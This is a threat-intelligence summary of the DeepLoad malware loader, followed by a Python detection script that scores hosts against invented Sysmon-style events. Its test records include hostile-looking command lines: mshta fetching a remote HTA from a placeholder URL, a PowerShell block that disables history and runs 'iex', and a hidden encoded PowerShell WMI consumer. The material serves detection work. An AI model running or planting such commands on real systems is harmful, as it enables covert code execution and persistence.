DeepLoad Loader Uses ClickFix Lure and WMI Persistence
🔒 ReliaQuest researchers detail a new malware loader, DeepLoad, distributed via a ClickFix social-engineering lure that tricks users into pasting PowerShell commands into the Windows Run dialog. The chain uses mshta.exe to execute an obfuscated PowerShell loader (the obfuscation is assessed as likely AI-assisted) that hides its payload inside a LockAppHost.exe process and disables PowerShell history to reduce forensic traces. DeepLoad compiles transient C# DLLs in the Temp directory, uses APC injection to run shellcode in suspended trusted processes so that the decoded payload is never written to disk, steals browser credentials and session data, drops a persistent malicious browser extension, copies itself to USB devices via deceptive shortcuts, and registers WMI event subscriptions to reinfect systems after they have been cleaned.
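The behaviours listed above map onto telemetry most Windows estates already collect: Sysmon process creation (Event ID 1), file creation (11), and WMI subscription events (19/20/21), plus PowerShell script block logging (4104). The following is an added example, not ReliaQuest's detection content and not DeepLoad code, that runs a handful of heuristic rules over constructed Sysmon-style records and scores a host by how many distinct stages of the chain it shows. The sample records, host names, and the specific indicators chosen (a PSReadLine `HistorySaveStyle SaveNothing` call as the history-disabling step, csc.exe as the writer of a Temp DLL, explorer.exe as the parent of a Run-dialog launch) are assumptions made for illustration, not details taken from the report.

```python
import re
from collections import defaultdict

# Constructed Sysmon-style records for this example only (field names follow Sysmon's
# EventData naming; hosts, paths, URLs and command lines are invented).
SAMPLE_EVENTS = [
    {"host": "ws01", "EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta http://example.invalid/verify"},
    {"host": "ws01", "EventID": 4104,
     "ScriptBlockText": "Set-PSReadLineOption -HistorySaveStyle SaveNothing; iex $p"},
    {"host": "ws01", "EventID": 11,
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "TargetFilename": r"C:\Users\u\AppData\Local\Temp\abc123\abc123.dll"},
    {"host": "ws01", "EventID": 20, "Name": "Updater", "Type": "Command Line",
     "Destination": "powershell.exe -w hidden -enc AAAA"},
    # Benign-looking activity on a second host: mshta from cmd.exe with a local file,
    # and a non-DLL temp file written by svchost.exe.
    {"host": "ws02", "EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": r"mshta C:\app\local.hta"},
    {"host": "ws02", "EventID": 11, "Image": r"C:\Windows\System32\svchost.exe",
     "TargetFilename": r"C:\Windows\Temp\x.tmp"},
]

URL = re.compile(r"https?://", re.I)
SCRIPT_HOSTS = ("powershell", "mshta", "cmd.exe")


def rule_clickfix_launch(e):
    # Assumption: a command pasted into the Run dialog is spawned by explorer.exe;
    # mshta.exe fetching a remote HTA from that parent is the lure pattern.
    if e.get("EventID") != 1 or not e.get("Image", "").lower().endswith("mshta.exe"):
        return None
    if not e.get("ParentImage", "").lower().endswith("explorer.exe"):
        return None
    if not URL.search(e.get("CommandLine", "")):
        return None
    return "mshta.exe spawned from explorer.exe with a remote URL (ClickFix-style launch)"


def rule_history_disabled(e):
    # Assumption: history is switched off through PSReadLine's HistorySaveStyle option.
    if e.get("EventID") != 4104:
        return None
    t = e.get("ScriptBlockText", "")
    if "HistorySaveStyle" in t and "SaveNothing" in t:
        return "PowerShell command history disabled via PSReadLine"
    return None


def rule_temp_dll_compile(e):
    # Assumption: the transient C# build goes through csc.exe writing a DLL under Temp.
    if e.get("EventID") != 11:
        return None
    f, img = e.get("TargetFilename", "").lower(), e.get("Image", "").lower()
    if f.endswith(".dll") and "\\temp\\" in f and img.endswith("csc.exe"):
        return "csc.exe wrote a DLL under Temp (transient C# compile)"
    return None


def rule_wmi_subscription(e):
    # Sysmon 19/20/21 cover filter, consumer and binding creation; any of them is rare
    # on a workstation, and a consumer that launches a scripting host is worse.
    eid = e.get("EventID")
    if eid == 19:
        return f"WMI event filter registered: {e.get('Name')} ({e.get('Query', '')})"
    if eid == 20:
        dest = e.get("Destination", "")
        flag = " (launches a scripting host)" if any(b in dest.lower() for b in SCRIPT_HOSTS) else ""
        return f"WMI event consumer registered: {e.get('Name')} -> {dest}{flag}"
    if eid == 21:
        return f"WMI filter-to-consumer binding: {e.get('Filter')} -> {e.get('Consumer')}"
    return None


RULES = [rule_clickfix_launch, rule_history_disabled, rule_temp_dll_compile, rule_wmi_subscription]


def analyze(events):
    """Return {host: [(rule_name, detail), ...]} for every record that matched a rule."""
    findings = defaultdict(list)
    for e in events:
        for rule in RULES:
            msg = rule(e)
            if msg:
                findings[e["host"]].append((rule.__name__, msg))
    return dict(findings)


def severity(host_findings):
    """Score by the number of distinct chain stages seen, not the raw hit count."""
    n = len({name for name, _ in host_findings})
    return "high" if n >= 3 else "medium" if n == 2 else "low" if n == 1 else "none"


if __name__ == "__main__":
    for host, hits in analyze(SAMPLE_EVENTS).items():
        print(f"{host}: {severity(hits)}")
        for name, detail in hits:
            print(f"  [{name}] {detail}")
```

The rules deliberately cover only what these log sources can see: the APC injection and the USB shortcut propagation described above leave no trace in these four event types, so a host scoring "low" here is not a clean host. On a live machine the WMI persistence can be confirmed directly with `Get-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding` (and the matching `__EventFilter` and `CommandLineEventConsumer` classes); removing the binding, filter and consumer together is what stops the reinfection loop.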
